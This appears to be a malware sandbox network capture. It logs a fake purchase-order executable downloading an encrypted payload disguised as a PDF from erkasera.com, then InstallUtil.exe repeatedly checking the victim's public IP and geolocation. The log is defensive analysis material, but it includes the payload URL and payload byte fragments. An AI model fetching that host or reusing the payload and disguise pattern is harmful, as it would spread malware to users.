Nov 5, 2024 11:05:12.189755917 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4f764cfd3bd65434f8550b362757dbe5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Nov 5, 2024 11:05:12.195750952 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 5, 2024 11:05:12.552293062 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3349ae408a803becb44a72aaf19c4f70 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Nov 5, 2024 11:05:13.644951105 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 5, 2024 11:05:13.908240080 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e21f553083efd8171728e718534a54da Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49828	132.226.247.73	80	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:14.660926104 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 5, 2024 11:05:15.531630993 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 09208e716abd7465937cfcddb43cea55 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49838	132.226.247.73	80	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:16.295959949 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 5, 2024 11:05:17.166435957 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8e2de389fd01ee615b0da011334ce5e5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49850	132.226.247.73	80	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:17.921863079 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:05:18.794475079 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a526f4c6b8c8b2e3492c54de5de7d4de Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49862	132.226.247.73	80	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:19.570687056 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:05:20.443250895 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 726744d1ff3eaf750be58b152a324e33 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49874	132.226.247.73	80	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:21.190170050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:05:22.067552090 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d0ff36d76322187eb86581c197da02be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49886	132.226.247.73	80	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 11:05:22.852019072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 5, 2024 11:05:23.947024107 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bd7858420f5d1b01788266f5c894688a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Nov 5, 2024 11:05:23.950422049 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bd7858420f5d1b01788266f5c894688a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	188.132.193.46	443	7248	C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:04:46 UTC	84	OUT	GET /ruurew/Gksrgyexmxn.pdf HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-11-05 10:04:46 UTC	198	IN	HTTP/1.1 200 OK Connection: close content-type: application/pdf last-modified: Tue, 05 Nov 2024 00:39:17 GMT accept-ranges: bytes content-length: 951312 date: Tue, 05 Nov 2024 10:04:20 GMT
2024-11-05 10:04:46 UTC	1170	IN	Data Raw: fe 72 c9 0f 46 22 cc 8e 58 8a d2 b6 14 6c 91 27 d2 86 e0 48 35 df 70 cd 14 d5 99 39 5c 3f 21 a9 f7 22 be 5d a0 0c 22 59 6e d0 dc 0f 2e 30 8d ea b6 06 51 6e 0e f4 7c 6b f2 53 ef 62 a5 0c 3b bd d6 9f 2f 9e 33 8c 0b 6e 50 ec ef a0 09 44 be 4d 6e dd 1b 00 d7 ab db 97 cc 02 41 4f 52 c3 f8 82 33 7f da ea 31 fe 05 10 7e 9c 16 2e aa 39 9c 28 f7 8a a5 10 4e ac 65 62 fb e6 09 c3 ed 71 99 90 b1 bf 5a 38 39 31 c7 ff 4e 76 fa 6a 58 f3 e3 e7 72 9a 5f 35 8c 7e f4 9e a2 66 5f 65 d2 ef f9 e4 b0 d0 91 a9 16 8b 11 73 a3 0c 1d ec 1a d3 eb cc 39 c3 44 e5 86 ee 1b 6e 52 fc 53 95 50 12 4b 6c 1c ca 9e 2e 28 60 ef 00 6f ed fe 73 9e 4c c2 fa ca 41 27 20 60 97 7e b3 6a 75 49 56 77 c5 20 30 46 ba 1f bb 5a 11 f4 ac 3c 03 75 37 bc 9d eb c1 50 fd 16 18 de 49 51 83 87 a0 3e f7 2b 83 9e Data Ascii: rF"Xl'H5p9\?!"]"Yn.0Qn\|kSb;/3nPDMnAOR31~.9(NebqZ891NvjXr_5~f_es9DnRSPKl.(`osLA' `~juIVw 0FZ<u7PIQ>+
2024-11-05 10:04:46 UTC	14994	IN	Data Raw: 72 46 e9 f2 45 75 11 a5 7a c0 df af 7c 20 5c 22 f2 1d 29 43 8d 67 77 23 f1 4f 3e 09 84 77 b9 f6 a6 8b 9e e2 44 24 83 d0 30 57 db 96 84 a4 15 b3 53 0e d5 2a d8 42 34 5c 23 bc 9d e8 00 9b 12 60 ab 42 75 e5 26 86 d1 8e 31 a2 ff bc 3c c8 71 96 68 a9 a3 7f 3d 24 0c eb 58 0d 52 b2 58 1b e3 8c 99 6d ed bd 93 54 27 ea cd 0e 81 cb 9c c6 80 e3 b7 0f 8b f4 ec 79 29 5e d8 0a d8 2c 55 db 82 c5 39 8c ce 0f c0 4d 95 0e b5 28 ca 05 eb a6 b1 6d 66 99 57 af 53 bc 9f ae ef f0 64 82 d3 59 41 19 ba 3a 0e 16 fa a5 56 f8 ed 2c 61 b7 92 a0 cb b6 d2 05 2d 79 50 aa 38 c0 a4 ab 61 c7 4b 50 f5 62 46 f8 f9 9a 12 93 6f a2 54 ef 75 b7 36 51 8a 57 a8 f1 cb a7 e7 88 ea d9 fe dd e5 8a c5 dd 5c 53 19 a6 de 44 1f 60 a2 2a 90 68 6a 65 96 73 02 40 da a8 4b 7f eb 3b 15 d6 25 d8 79 92 51 aa 67 Data Ascii: rFEuz\| \")Cgw#O>wD$0WSB4\#`Bu&1<qh=$XRXmT'y)^,U9M(mfWSdYA:V,a-yP8aKPbFoTu6QW\SD`hjes@K;%yQg
2024-11-05 10:04:46 UTC	16384	IN	Data Raw: b2 19 95 e7 78 71 9d ba ab de cc 37 e5 17 97 ea 92 92 d6 28 1a a7 f6 5f 3b 62 12 b6 12 31 57 f0 a4 ee 87 c9 20 47 b4 46 ad 7b 05 41 28 46 66 0f fb ee f1 d3 3f 83 42 12 5a 11 b0 31 87 a6 d3 37 ed f0 64 aa 45 90 11 82 42 4a 98 ae f2 f4 69 30 4d d2 67 e8 29 a8 ad 4f 91 f9 ef 8f 3c 6b 7a 53 8c e7 45 83 01 31 5c ba 22 df fb 19 24 f5 2e 49 ea 24 21 b5 f2 89 66 08 59 9a df 8c 55 73 2f 71 29 0a d1 5a 38 8e 47 a7 e0 6c 0f f9 1a 13 fa 45 05 3a ac 6e eb f4 de 01 db 00 1a 02 27 94 f1 ae 69 3e 3c 40 4e c1 4d ab 39 11 44 77 82 bf 8f 9e 20 2d 96 ef b6 fe 31 23 dc f8 5b d3 aa ad d4 41 e6 de 04 ea f9 23 e0 9f fd 28 87 a0 be e6 2e 0f 46 8f 33 07 f4 23 00 b6 99 99 8d b0 4a 96 10 79 df 17 ed 71 30 3f 80 8f f5 d7 0e 7e 8c ca ce c7 a0 d9 16 77 c9 1c ba 3f 3f 8b 58 2d d3 04 c1 Data Ascii: xq7(_;b1W GF{A(Ff?BZ17dEBJi0Mg)O<kzSE1\"$.I$!fYUs/q)Z8GlE:n'i><@NM9Dw -1#[A#(.F3#Jyq0?~w??X-
2024-11-05 10:04:46 UTC	16384	IN	Data Raw: e2 5d d0 50 e7 8e 70 d1 77 ff d3 de 1f c6 34 85 2a 8a 14 3d 2a 38 2f 41 96 a1 ee f4 ec 6b 71 61 b2 8b 9f 32 af ee 8e d6 0d b5 f5 2a 23 5a 58 59 73 ea a7 d7 0c 9a ac 13 9c 96 09 9d 71 a7 7f 0d 4b 6f 13 fa 40 41 e2 e9 a9 f5 b4 4e 18 4c 43 83 47 04 fa 5f bd ea 8f 31 b4 f1 98 4c 26 14 19 b4 03 c0 d5 1b 9c ba c1 fe 85 a1 15 42 d0 45 f1 fa 14 8c 83 8d ca 73 49 01 98 04 6e 21 b2 6d d2 74 77 65 4b 9d 32 65 fe 92 24 ab 6d 3d 4f 18 57 34 09 80 53 50 37 50 43 d3 9f df b9 86 6b f1 33 a0 32 0f af ec ca b0 65 cc b8 bb ac 09 72 31 f5 bf 75 88 41 85 e7 59 3d 3b 3c 3d 22 b9 f8 d9 fc 5f 5d f1 4d bb 72 7f fd 01 71 83 f9 29 e2 78 9d 74 d9 6c ba 90 f6 d4 20 3e 24 43 8a ed 58 1f 09 1a 73 ff 64 42 50 6b 62 9d 9a 3f 12 fb 38 da 7a 34 07 e0 46 9b 28 9c 63 9f a7 36 1e f8 b2 bb a9 Data Ascii: ]Ppw4=8/Akqa2*#ZXYsqKo@ANLCG_1L&BEsIn!mtweK2e$m=OW4SP7PCk32er1uAY=;<="_]Mrq)xtl >$CXsdBPkb?8z4F(c6
2024-11-05 10:04:46 UTC	16384	IN	Data Raw: 06 54 37 15 aa b8 1e 47 8d 51 54 ac 30 6f cf 02 1b 09 c3 03 4f 4f 3a 1a e4 f3 de 99 43 a7 58 d6 29 a7 7e 27 9e 03 f1 b1 12 d1 62 0b 19 55 19 4f 22 93 ae d1 fa 8f cb f1 17 7b 15 1a ae 54 9a 06 6f fa 04 6c 99 6d ab d9 0c 4a 1d c2 90 26 1e 27 54 26 38 9d c4 f2 f1 04 22 df 16 a3 7b db eb 9b c0 37 78 c8 e1 43 f8 c1 bc 78 b7 04 52 ea f3 25 ea ed e9 29 03 e2 e7 f5 33 3d 85 77 97 4d 11 d6 fc 1f cf 9f c5 55 cd 13 05 d5 9e 0c 52 e1 c8 4a b2 b8 f6 83 f9 86 19 c5 b8 64 ce d3 2f c0 f1 3d 58 fb 33 84 77 51 29 82 eb 45 f1 af fb 39 26 ef 67 bb ee 48 b9 ff fb f1 9e 6e 6d 31 fb 66 e5 be a1 8f 25 5e 26 7f 6a d7 29 86 5b 5d 9e e7 de 48 fa be ca 6f f7 61 ee 46 3c ce a6 86 9d 4a 40 db 05 07 fa 52 6f 9a 59 df 4b 95 03 25 93 4a f8 c2 ed 40 f7 66 30 a2 3c 24 eb b2 18 12 a1 e5 8a Data Ascii: T7GQT0oOO:CX)~'bUO"{TolmJ&'T&8"{7xCxR%)3=wMURJd/=X3wQ)E9&gHnm1f%^&j)[]HoaF<J@RoYK%J@f0<$
2024-11-05 10:04:46 UTC	16384	IN	Data Raw: f0 77 36 fe 64 92 a8 fe a6 14 53 0a ca 12 42 da 65 0f 9e 15 53 bd 88 6e 97 b7 86 78 7f ff 17 a4 09 57 37 58 72 ec 65 a2 f7 97 5d 69 00 af 3c 7e 75 b0 c9 6c c1 54 65 28 0f 93 af 6f 00 d2 ec b5 3b c3 6b b1 87 4e 0c 48 85 69 80 56 0f d1 9d 3f 60 57 f4 8e 0f b1 dd e6 3f b5 ac 7f 46 c7 0d 8c 14 38 91 89 80 02 64 b7 e7 28 c3 6e 04 ac b7 fd 45 15 4d 08 42 ea f3 96 51 51 30 83 b2 f6 95 41 d7 2c d6 d6 3f ea 46 42 f6 97 f8 3a fa cf e8 2e da 22 ad 3e f3 e7 d3 bc 5e 95 bb 04 f1 6b 2e 5f 28 3e 11 1b 02 f2 d0 64 31 80 82 ad 14 9a f3 28 32 83 61 c2 58 8d cb 3f 58 8f e0 9d 4f d1 cd 2b 01 fb bb 64 22 74 40 d0 ad 18 63 0c d5 17 3c c7 02 25 b5 02 11 b0 65 53 2f 3e ce b0 b4 fe b3 af f3 6c 2c 39 da 77 f0 13 9a 85 b4 cb 64 4c 96 d3 7f 93 7f 3f 59 d0 71 bb 0d 5b 3c 40 d5 23 30 Data Ascii: w6dSBeSnxW7Xre]i<~ulTe(o;kNHiV?`W?F8d(nEMBQQ0A,?FB:.">^k._(>d1(2aX?XO+d"t@c<%eS/>l,9wdL?Yq[<@#0
2024-11-05 10:04:46 UTC	16384	IN	Data Raw: 1f f8 fc 77 ce 7f d6 8b c8 b8 ac ed 5d 6a 7a 65 e0 b8 45 ba 8f 50 3a 7a 18 28 f1 c7 df da b1 7f fc 81 89 5e 5f 48 46 1e e7 69 de 4f cb 3b e8 ad 70 9a 3a 08 0a 9a 47 45 26 aa 95 9e 80 ac c6 8d 85 34 06 0b 70 0c 6f 22 64 aa 4e 3c 01 ee dc e6 59 06 06 5b 9d d5 31 65 72 b8 ee f6 8b ee 00 3c 37 48 65 81 7e 73 02 d5 f6 b5 f6 98 2d 7d 17 39 4f 42 1f ac 4d 54 56 e6 03 b4 6c ce 3a 39 7c 11 3a 97 cd 68 01 b6 80 4b 09 28 d5 79 50 ee d9 33 dc b6 87 30 e4 2f e8 57 7e 30 23 eb 92 53 1e 05 ed a9 58 e3 6f b1 b6 e2 d6 b1 01 c3 3b 77 33 67 1f 63 71 a1 57 1c 84 c2 eb d5 21 20 9f cd 2f 72 7d 5d 8a 24 cc 3f dd 63 63 b9 cc 9d f2 16 bb 89 18 fd 8e 88 ac 9d d8 4b 35 d1 7d fe 53 85 f6 60 a6 29 51 ce d5 c9 3d 5a 72 e5 dc ad 35 99 8d 63 65 4e 00 d1 e5 68 95 21 75 4a ec c0 7f cd 00 Data Ascii: w]jzeEP:z(^_HFiO;p:GE&4po"dN<Y[1er<7He~s-}9OBMTVl:9\|:hK(yP30/W~0#SXo;w3gcqW! /r}]$?ccK5}S`)Q=Zr5ceNh!uJ
2024-11-05 10:04:46 UTC	16384	IN	Data Raw: d4 ee 18 2d 33 70 28 c0 1f 89 29 73 05 38 d4 09 df 0d 27 fb ea 7b 6e 0d b9 b5 38 20 c1 82 a6 32 3a 24 23 ae eb 8e 4c 8f 91 7e ad 5d 87 bc a8 16 b6 7e 50 00 03 80 55 9b 1f 56 04 2a e2 64 a8 e3 07 55 41 b7 1d 87 70 af 01 78 4f 1e 33 fa 0d b5 c1 f3 5f 44 6f f6 65 41 d3 fc d2 62 37 fe 49 b5 c1 5d 6a 1b 52 21 bc a3 bd f8 ab 3d 4c 12 83 09 51 8d 9a fb d3 c2 e6 86 fe 46 ad 01 89 21 ee 26 59 50 bd ce 49 2e d3 9f 8a 87 f1 78 f2 f4 fd 42 e7 76 6e 92 c6 71 52 37 37 e0 4e 47 53 be 42 26 19 28 2a 99 a0 9f 15 f5 a1 b2 2d f5 f6 fe 13 72 98 f4 07 15 ec f6 75 81 cf 81 40 bd 25 48 23 e4 3b 23 fa cc b9 8d c1 13 9e e0 9c a2 89 35 06 7e 65 bb a1 58 83 4b 8e e7 95 0f cb 17 f6 8e 45 af 8f 7a 3b b5 c9 c2 28 dd 67 ee f9 10 02 93 e9 5b 24 5e a2 43 e1 6d 28 b1 8b 4b 17 0b d8 43 cf Data Ascii: -3p()s8'{n8 2:$#L~]~PUVdUApxO3_DoeAb7I]jR!=LQF!&YPI.xBvnqR77NGSB&(-ru@%H#;#5~eXKEz;(g[$^Cm(KC
2024-11-05 10:04:46 UTC	16384	IN	Data Raw: f6 41 7c f9 74 ae 87 ac 59 a8 07 59 66 b6 ac 8f ba a1 75 a1 3d c8 ec 38 50 bf 68 a5 f4 93 71 4f 28 82 ba 55 e2 62 df 8a 65 4a 57 65 fa b1 60 a9 59 5c e8 78 12 65 51 23 05 cc 5f 16 70 40 08 18 07 08 69 47 85 f4 c2 5b 50 33 c6 16 f0 98 8b 6a 03 0d 1e 73 59 67 b5 a8 e4 69 d8 7b d7 6e 95 64 bb 3d fd 04 06 7d 96 da e9 b7 33 c3 d3 ca ac b0 52 49 16 b4 a3 3a 4f fe 9e 78 5f f9 f7 85 55 e6 18 90 58 5f 84 f7 9d 25 c8 6a 5b b9 d5 2b db 26 7c 64 52 74 09 35 d5 0e 2d 85 71 bf 18 a9 f0 25 64 a7 e0 47 75 c5 40 cb 74 38 c0 bf 37 44 ec 96 2b 62 92 af 80 d0 0b 82 91 48 db 81 df a5 8e ee ae 16 a0 5c 47 b9 11 03 51 c2 1b 4f f1 77 1c 43 4a 9c 40 c0 19 e1 4f 74 5a 8b 7a 75 75 83 75 3f 73 43 42 60 aa 05 41 a3 39 70 9e ba 0b 43 9b b5 0b 75 14 cc 80 c1 26 4d f2 22 60 fc 27 ab c0 Data Ascii: A\|tYYfu=8PhqO(UbeJWe`Y\xeQ#_p@iG[P3jsYgi{nd=}3RI:Ox_UX_%j[+&\|dRt5-q%dGu@t87D+bH\GQOwCJ@OtZzuuu?sCB`A9pCu&M"`'
2024-11-05 10:04:46 UTC	220	IN	Data Raw: d2 2a 44 4c e5 5c 61 25 9e 05 d8 a6 e6 34 49 8c 12 b4 b9 f9 05 2c f7 b7 47 52 d5 db 4b 41 33 af be 48 71 e8 a6 76 bc aa c5 78 28 5e 36 de eb b8 42 36 65 ad cf 48 48 8a dc 47 b9 61 f4 57 1b 7e a8 18 48 b8 aa 07 f9 ce 04 fc 9e f3 50 ff 5c 88 a9 c4 24 a6 a1 d9 c5 d3 61 b9 30 53 04 09 92 a5 87 90 ab 4d 1d cf 96 e7 6f cc f4 5e 57 51 41 bc 38 73 7e 08 4c 43 42 58 d7 12 9a c5 14 1d 27 d8 8a 9a b6 59 5f c5 7c e3 95 c2 75 1d 83 e2 dd bd 96 f4 0e 63 8d e1 95 b1 01 12 ee 52 d3 02 18 24 16 5c 05 20 c6 61 81 28 b2 23 aa c4 19 cf fb c1 3a dc cf a4 24 d9 c0 69 1c df 68 65 fb 7b d9 71 7d 54 a7 c3 65 e2 fc cb ad e7 ae d1 16 2b 51 e9 60 f7 39 57 37 5d 22 d3 25 66 ae c6 Data Ascii: *DL\a%4I,GRKA3Hqvx(^6B6eHHGaW~HP\$a0SMo^WQA8s~LCBX'Y_\|ucR$\ a(#:$ihe{q}Te+Q`9W7]"%f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:04:52 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:04:52 UTC	1231	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:52 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21770 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uho5aHqqRl%2F9ddyzJ%2B%2Blc9zTwmp2Y%2BrJETr8ZqjLUH1pdyTyMF0E33h5q%2FS%2B3T0%2FjzVbCY9ING6ejJSqJqJhVtx6qC5wvhP%2B2YVK5LcOmceGqja7hjlEMb%2FpQiR9SUN71Nz%2Fop9S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc05a9bb626c55-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1116&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2520452&cwnd=244&unsent_bytes=0&cid=b40972b64a44407a&ts=207&x=0"
